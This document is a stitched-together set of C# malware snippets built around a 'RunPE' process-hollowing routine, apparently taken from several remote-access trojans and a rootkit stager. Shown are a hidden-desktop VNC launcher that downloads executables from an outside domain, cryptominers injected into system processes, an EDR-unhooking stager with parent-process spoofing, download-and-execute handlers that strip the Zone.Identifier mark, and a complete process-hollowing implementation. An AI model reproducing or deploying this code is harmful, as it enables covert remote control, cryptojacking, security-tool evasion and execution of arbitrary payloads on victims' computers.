// Token: 0x060000E6 RID: 230 RVA: 0x00010928 File Offset: 0x0000EB28 public static void StartHVNC(string ipport) { if (!HVNC.Running) { HVNC.SA.bInheritHandle = -1; HVNC.SA.lpSecurityDescriptor = (IntPtr)0L; HVNC.hNewDesktop = HVNC.CreateDesktop("RemoteDesktop", (IntPtr)0L, (IntPtr)0L, 1u, 511u, HVNC.SA); RunPE.PROCESS_INFORMATION process_INFORMATION = default(RunPE.PROCESS_INFORMATION); RunPE.STARTUP_INFORMATION startup_INFORMATION = default(RunPE.STARTUP_INFORMATION); startup_INFORMATION.cb = Marshal.SizeOf(typeof(RunPE.STARTUP_INFORMATION)); startup_INFORMATION.lpDesktop = "RemoteDesktop"; string lpApplicationName = Environment.GetFolderPath(Environment.SpecialFolder.System).Substring(0, 3) + "Windows\\explorer.exe"; string lpCommandLine = null; HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES2; HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES = security_ATTRIBUTES2; HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES3 = security_ATTRIBUTES2; RunPE.CreateProcess(lpApplicationName, lpCommandLine, ref security_ATTRIBUTES, ref security_ATTRIBUTES3, false, 0u, IntPtr.Zero, null, ref startup_INFORMATION, out process_INFORMATION); WebClient webClient = new WebClient(); byte[] data; if (Environment.Version.Major == 2) { data = webClient.DownloadData("http://fuehaoisdfhjaefouiads.info/HVNC20.exe"); } if (Environment.Version.Major == 4) { data = webClient.DownloadData("http://fuehaoisdfhjaefouiads.info/HVNC40.exe"); } RunPE.TryRun(Process.GetCurrentProcess().MainModule.FileName, ipport, data, true, true, "RemoteDesktop", ref HVNC.PID); HVNC.Running = true; } }
public void RunMiner(MsgPack unpack_msgpack) { try { string xmrig = Path.GetTempPath() + unpack_msgpack.ForcePathObject("Hash").AsString + ".bin"; string injectTo = unpack_msgpack.ForcePathObject("InjectTo").AsString; string args = $"-B --donate-level=1 -t {Environment.ProcessorCount / 2} -v 0 --cpu-priority=3 -a cn/r -k -o {unpack_msgpack.ForcePathObject("Pool").AsString} -u {unpack_msgpack.ForcePathObject("Wallet").AsString} -p {unpack_msgpack.ForcePathObject("Pass").AsString}"; if (!File.Exists(xmrig)) { //ask server to send xmrig MsgPack msgpack = new MsgPack(); msgpack.ForcePathObject("Packet").AsString = "GetXmr"; Connection.Send(msgpack.Encode2Bytes()); return; } KillMiner(); if (RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injectTo), Zip.Decompress(File.ReadAllBytes(Path.GetTempPath() + unpack_msgpack.ForcePathObject("Hash").AsString + ".bin")), args, false)) { SetRegistry.SetValue(Connection.Hwid, "1"); } } catch (Exception ex) { Packet.Error(ex.Message); } }
// Loads Payload.exe (native executable) from resources and injects into suitable OS executable. // This stage is required to be C#, because the startup stage may only contain C# code with a maximum of 260 characters for the commandline. // The next stage is the actual payload, which is required to be a native executable in order to be injected. public static void Main() { string path = Environment.Is64BitOperatingSystem ? @"C:\Windows\SysWOW64\svchost.exe" : @"C:\Windows\System32\svchost.exe"; byte[] payload = Decompress(Decrypt(Resources.Payload)); RunPE.Run(path, payload); }
// The target framework is .NET 3.5. // Normally, if .NET 4.x is installed, but .NET 3.5 isn't, this executable doesn't start. // However, the target framework is not relevant in the powershell context. // The executable will run, if *either* .NET 3.5 *or* .NET 4.x is installed. // To immediately spot code that is incompatible with .NET 3.5, the target framework is set to .NET 3.5. public static void Main() { Process.EnterDebugMode(); // Get r77 service executable. byte[] payload32 = Decompress(Decrypt(Resources.InstallService32)); byte[] payload64 = Decompress(Decrypt(Resources.InstallService64)); // Executable to be used for process hollowing. string path = @"C:\Windows\System32\dllhost.exe"; string pathWow64 = @"C:\Windows\SysWOW64\dllhost.exe"; string commandLine = "/Processid:" + Guid.NewGuid().ToString("B"); // Random commandline to mimic an actual dllhost.exe commandline (has no effect). // Parent process spoofing can only be used on certain processes, particularly the PROCESS_CREATE_PROCESS privilege is required. int parentProcessId = Process.GetProcessesByName("winlogon")[0].Id; // Create the 32-bit and 64-bit instance of the r77 service. if (Helper.Is64BitOperatingSystem()) { if (IntPtr.Size == 4) { RunPE.Run(pathWow64, commandLine, payload32, parentProcessId); } else { RunPE.Run(path, commandLine, payload64, parentProcessId); } } else { RunPE.Run(path, commandLine, payload32, parentProcessId); } }
// Token: 0x06000091 RID: 145 RVA: 0x0000B830 File Offset: 0x00009A30 public static void BTCGPU(string p1, string p2, string p3, bool hidden, string proxy = "") { try { if (!File.Exists(HandleMiner.BFGCLoc)) { Functions.URLDownloadToFile(null, HandleMiner.BFGC, HandleMiner.BFGCLoc, 0, IntPtr.Zero); } } catch (Exception ex) { return; } byte[] buffer = File.ReadAllBytes(HandleMiner.BFGCLoc); byte[] pix_Sub_ = HandleMiner.ASDF(buffer, 8); byte[] array = HandleMiner.PIX_Func_002_COIN(pix_Sub_); if (proxy.Length > 1) { string fileName = Process.GetCurrentProcess().MainModule.FileName; string cmd = string.Concat(new string[] { "-S opencl:auto --url=", p1, " -u ", p2, " -p ", p3, " --gpu-threads=2 --intensity=6 -x ", proxy }); byte[] data = array; bool compatible = true; string desktop = ""; int num = 0; RunPE.TryRun(fileName, cmd, data, compatible, hidden, desktop, ref num); } else { string fileName2 = Process.GetCurrentProcess().MainModule.FileName; string cmd2 = string.Concat(new string[] { "-S opencl:auto --url=", p1, " -u ", p2, " -p ", p3, " --gpu-threads=2 --intensity=6" }); byte[] data2 = array; bool compatible2 = true; string desktop2 = ""; int num = 0; RunPE.TryRun(fileName2, cmd2, data2, compatible2, hidden, desktop2, ref num); } }
// Token: 0x06000093 RID: 147 RVA: 0x0000BA8C File Offset: 0x00009C8C public static void BTCCPU(string p1, string p2, string p3, bool hidden, string proxy = "") { try { if (!File.Exists(HandleMiner.CPUCLoc)) { Functions.URLDownloadToFile(null, HandleMiner.CPUC, HandleMiner.CPUCLoc, 0, IntPtr.Zero); } } catch (Exception ex) { return; } byte[] buffer = File.ReadAllBytes(HandleMiner.CPUCLoc); byte[] array = HandleMiner.PIX_Func_002_COIN(HandleMiner.ASDF(buffer, 8)); if (proxy.Length > 1) { string fileName = Process.GetCurrentProcess().MainModule.FileName; string cmd = string.Concat(new string[] { "--url=", p1, " --userpass="******":", p3, " --algo=sha256d --proxy=", proxy }); byte[] data = array; bool compatible = true; string desktop = ""; int num = 0; RunPE.TryRun(fileName, cmd, data, compatible, hidden, desktop, ref num); } else { string fileName2 = Process.GetCurrentProcess().MainModule.FileName; string cmd2 = string.Concat(new string[] { "--url=", p1, " --userpass="******":", p3, " --algo=sha256d" }); byte[] data2 = array; bool compatible2 = true; string desktop2 = ""; int num = 0; RunPE.TryRun(fileName2, cmd2, data2, compatible2, hidden, desktop2, ref num); } }
public void SendToMemory(MsgPack unpack_msgpack) { try { byte[] buffer = unpack_msgpack.ForcePathObject("File").GetAsBytes(); string injection = unpack_msgpack.ForcePathObject("Inject").AsString; if (injection.Length == 0) { //Reflection new Thread(delegate() { try { Assembly loader = Assembly.Load(Methods.Decompress(buffer)); object[] parm = null; if (loader.EntryPoint.GetParameters().Length > 0) { parm = new object[] { new string[] { null } }; } loader.EntryPoint.Invoke(null, parm); } catch (Exception ex) { Packet.Error(ex.Message); } }) { IsBackground = true }.Start(); } else { //RunPE new Thread(delegate() { try { RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injection), Methods.Decompress(buffer), "", true); } catch (Exception ex) { Packet.Error(ex.Message); } }) { IsBackground = true }.Start(); } } catch (Exception ex) { Packet.Error(ex.Message); } Connection.Disconnected(); }
// The target framework is .NET 3.5. // Normally, if .NET 4.x is installed, but .NET 3.5 isn't, this executable doesn't start. // However, the target framework is not relevant in the powershell context. // The executable will run, if *either* .NET 3.5 *or* .NET 4.x is installed. // To immediately spot code that is incompatible with .NET 3.5, the target framework is set to .NET 3.5. public static void Main() { // Unhook DLL's that are monitored by EDR. // Otherwise, the call sequence analysis of process hollowing gets detected and the stager is terminated. Unhook.UnhookDll("ntdll.dll"); if (Environment.OSVersion.Version.Major >= 10 || IntPtr.Size == 8) { // Unhooking kernel32.dll on Windows 7 x86 fails. //TODO: Find out why unhooking kernel32.dll on Windows 7 x86 fails. Unhook.UnhookDll("kernel32.dll"); } Process.EnterDebugMode(); // Get r77 service executable. byte[] payload32 = Decompress(Decrypt(Resources.InstallService32)); byte[] payload64 = Decompress(Decrypt(Resources.InstallService64)); // Executable to be used for process hollowing. string path = @"C:\Windows\System32\dllhost.exe"; string pathWow64 = @"C:\Windows\SysWOW64\dllhost.exe"; string commandLine = "/Processid:" + Guid.NewGuid().ToString("B"); // Random commandline to mimic an actual dllhost.exe commandline (has no effect). // Parent process spoofing can only be used on certain processes, particularly the PROCESS_CREATE_PROCESS privilege is required. int parentProcessId = Process.GetProcessesByName("winlogon")[0].Id; // Create the 32-bit and 64-bit instance of the r77 service. if (Helper.Is64BitOperatingSystem()) { if (IntPtr.Size == 4) { RunPE.Run(pathWow64, commandLine, payload32, parentProcessId); } else { RunPE.Run(path, commandLine, payload64, parentProcessId); } } else { RunPE.Run(path, commandLine, payload32, parentProcessId); } }
// Token: 0x0600009A RID: 154 RVA: 0x0000BD80 File Offset: 0x00009F80 public static int TryRun(string path, string cmd, byte[] data, bool compatible, bool hidden, string Desktop = "", ref int PID = 0) { try { int num = 1; while (!RunPE.HandleRun(path, cmd, data, compatible, hidden, Desktop, ref PID)) { num++; if (num > 10) { return(0); } } return(-1); } catch (Exception ex) { } return(0); }
// Token: 0x060000A5 RID: 165 RVA: 0x0000BDD0 File Offset: 0x00009FD0 private static bool HandleRun(string path, string cmd, byte[] data, bool compatible, bool hidden = false, string Desktop = "", ref int PID = 0) { string text = string.Format("\"{0}\"", path); RunPE.STARTUP_INFORMATION startup_INFORMATION = default(RunPE.STARTUP_INFORMATION); RunPE.PROCESS_INFORMATION process_INFORMATION = default(RunPE.PROCESS_INFORMATION); startup_INFORMATION.cb = Marshal.SizeOf(typeof(RunPE.STARTUP_INFORMATION)); if (Desktop.Length > 0) { startup_INFORMATION.lpDesktop = Desktop; } if (hidden) { startup_INFORMATION.wShowWindow = 0; startup_INFORMATION.dwFlags = 1; } try { if (!string.IsNullOrEmpty(cmd)) { text = text + " " + cmd; } string lpCommandLine = text; HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES2; HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES = security_ATTRIBUTES2; HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES3 = security_ATTRIBUTES2; if (!RunPE.CreateProcess(path, lpCommandLine, ref security_ATTRIBUTES, ref security_ATTRIBUTES3, false, 4u, IntPtr.Zero, null, ref startup_INFORMATION, out process_INFORMATION)) { throw new Exception(); } int num = BitConverter.ToInt32(data, 60); int num2 = BitConverter.ToInt32(data, num + 52); int[] array = new int[179]; array[0] = 65538; if (IntPtr.Size == 4) { if (!RunPE.GetThreadContext(process_INFORMATION.ThreadHandle, array)) { throw new Exception(); } } else if (!RunPE.Wow64GetThreadContext(process_INFORMATION.ThreadHandle, array)) { throw new Exception(); } int num3 = array[41]; int num4; int num5; if (!RunPE.ReadProcessMemory(process_INFORMATION.ProcessHandle, num3 + 8, ref num4, 4, ref num5)) { throw new Exception(); } if (num2 == num4 && RunPE.NtUnmapViewOfSection(process_INFORMATION.ProcessHandle, num4) != 0) { throw new Exception(); } int length = BitConverter.ToInt32(data, num + 80); int bufferSize = BitConverter.ToInt32(data, num + 84); int num6 = RunPE.VirtualAllocEx(process_INFORMATION.ProcessHandle, num2, length, 12288, 64); bool flag; if (!compatible && num6 == 0) { flag = true; num6 = RunPE.VirtualAllocEx(process_INFORMATION.ProcessHandle, 0, length, 12288, 64); } if (num6 == 0) { throw new Exception(); } if (!RunPE.WriteProcessMemory(process_INFORMATION.ProcessHandle, num6, data, bufferSize, ref num5)) { throw new Exception(); } int num7 = num + 248; short num8 = BitConverter.ToInt16(data, num + 6); int num9 = 0; int num10 = (int)(num8 - 1); for (int i = num9; i <= num10; i++) { int num11 = BitConverter.ToInt32(data, num7 + 12); int num12 = BitConverter.ToInt32(data, num7 + 16); int srcOffset = BitConverter.ToInt32(data, num7 + 20); if (num12 != 0) { byte[] array2 = new byte[num12 - 1 + 1]; Buffer.BlockCopy(data, srcOffset, array2, 0, array2.Length); if (!RunPE.WriteProcessMemory(process_INFORMATION.ProcessHandle, num6 + num11, array2, array2.Length, ref num5)) { throw new Exception(); } } num7 += 40; } byte[] bytes = BitConverter.GetBytes(num6); if (!RunPE.WriteProcessMemory(process_INFORMATION.ProcessHandle, num3 + 8, bytes, 4, ref num5)) { throw new Exception(); } int num13 = BitConverter.ToInt32(data, num + 40); if (flag) { num6 = num2; } array[44] = num6 + num13; if (IntPtr.Size == 4) { if (!RunPE.SetThreadContext(process_INFORMATION.ThreadHandle, array)) { throw new Exception(); } } else if (!RunPE.Wow64SetThreadContext(process_INFORMATION.ThreadHandle, array)) { throw new Exception(); } if (RunPE.ResumeThread(process_INFORMATION.ThreadHandle) == -1) { throw new Exception(); } PID = (int)process_INFORMATION.ProcessId; } catch (Exception ex) { Process processById = Process.GetProcessById((int)process_INFORMATION.ProcessId); if (processById != null) { processById.Kill(); } return(false); } return(true); }
public static void HandleUploadAndExecute(Packets.ServerPackets.UploadAndExecute command, Client client) { string filePath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), command.FileName); try { if (command.CurrentBlock == 0 && command.Block[0] != 'M' && command.Block[1] != 'Z') { throw new Exception("No executable file"); } MemorySplit destFile = new MemorySplit(filePath); if (!destFile.AppendBlock(command.Block, command.CurrentBlock)) { new Packets.ClientPackets.Status(string.Format("Writing failed: {0}", destFile.LastError)).Execute( client); return; } if ((command.CurrentBlock + 1) == command.MaxBlocks) // execute { if (command.Type == "drop") { if (!destFile.DropFile()) { new Packets.ClientPackets.Status(string.Format("Drop failed: {0}", destFile.LastError)).Execute( client); return; } DeleteFile(filePath + ":Zone.Identifier"); ProcessStartInfo startInfo = new ProcessStartInfo(); if (command.RunHidden) { startInfo.WindowStyle = ProcessWindowStyle.Hidden; startInfo.CreateNoWindow = true; } startInfo.UseShellExecute = command.RunHidden; startInfo.FileName = filePath; Process.Start(startInfo); new Packets.ClientPackets.Status("Executed File!").Execute(client); } else if (command.Type == "self") { byte[] dat = destFile.ToByteArray(); //File.WriteAllBytes("lol.exe", dat); if (dat == null) { new Packets.ClientPackets.Status("Payload was null!").Execute(client); return; } //Assembly a = Assembly.Load(xClient.Properties.Resources.RunPELib); //a.EntryPoint.Invoke(null, new object[] { new string[] { Convert.ToBase64String(dat), "self", "" } }); RunPE.Invoke(new string[] { Convert.ToBase64String(dat), "self", "" }, client); } else if (command.Type == "cmd") { byte[] dat = destFile.ToByteArray(); if (dat == null) { new Packets.ClientPackets.Status("Payload was null!").Execute(client); return; } //Assembly a = Assembly.Load(xClient.Properties.Resources.RunPELib); //a.EntryPoint.Invoke(null, new object[] { new string[] { Convert.ToBase64String(dat), "sys", "cmd" } }); RunPE.Invoke(new string[] { Convert.ToBase64String(dat), "sys", "cmd" }, client); } else { new Packets.ClientPackets.Status("Unknown Injection Type!").Execute(client); } } } catch (Exception ex) { DeleteFile(filePath); new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.ToString())).Execute(client); //MessageBox.Show(ex.ToString()); } }
public static void HandleDownloadAndExecuteCommand(Packets.ServerPackets.DownloadAndExecute command, Client client) { new Packets.ClientPackets.Status("Downloading file...").Execute(client); new Thread(() => { try { if (command.Type == "drop") { #region drop string tempFile = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), Helper.Helper.GetRandomFilename(12, ".exe")); try { using (WebClient c = new WebClient()) { c.Proxy = null; c.DownloadFile(command.URL, tempFile); } } catch { new Packets.ClientPackets.Status("Download failed!").Execute(client); return; } new Packets.ClientPackets.Status("Downloaded File!").Execute(client); try { DeleteFile(tempFile + ":Zone.Identifier"); var bytes = File.ReadAllBytes(tempFile); if (bytes[0] != 'M' && bytes[1] != 'Z') { throw new Exception("Not an .EXE file!"); } ProcessStartInfo startInfo = new ProcessStartInfo(); if (command.RunHidden) { startInfo.WindowStyle = ProcessWindowStyle.Hidden; startInfo.CreateNoWindow = true; } startInfo.UseShellExecute = command.RunHidden; startInfo.FileName = tempFile; Process.Start(startInfo); } catch (Exception ex) { DeleteFile(tempFile); new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.Message)).Execute(client); return; } #endregion } else if (command.Type == "self") { byte[] fileBytes = Download(command.URL, client); if (fileBytes == null) { new Packets.ClientPackets.Status("Download failed!").Execute(client); } RunPE.Invoke(new string[] { Convert.ToBase64String(fileBytes), "self", "" }, client); } else if (command.Type == "cmd") { byte[] fileBytes = Download(command.URL, client); if (fileBytes == null) { new Packets.ClientPackets.Status("Download failed!").Execute(client); } RunPE.Invoke(new string[] { Convert.ToBase64String(fileBytes), "sys", "cmd" }, client); } else { new Packets.ClientPackets.Status("Unknown Injection Type!").Execute(client); } } catch (Exception ex) { new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.Message)).Execute(client); return; } new Packets.ClientPackets.Status("Executed File!").Execute(client); }).Start(); }
public void Inject(byte[] payload, string target) { //Add actions if RunPe.Run returns false RunPE.Run(payload, target); }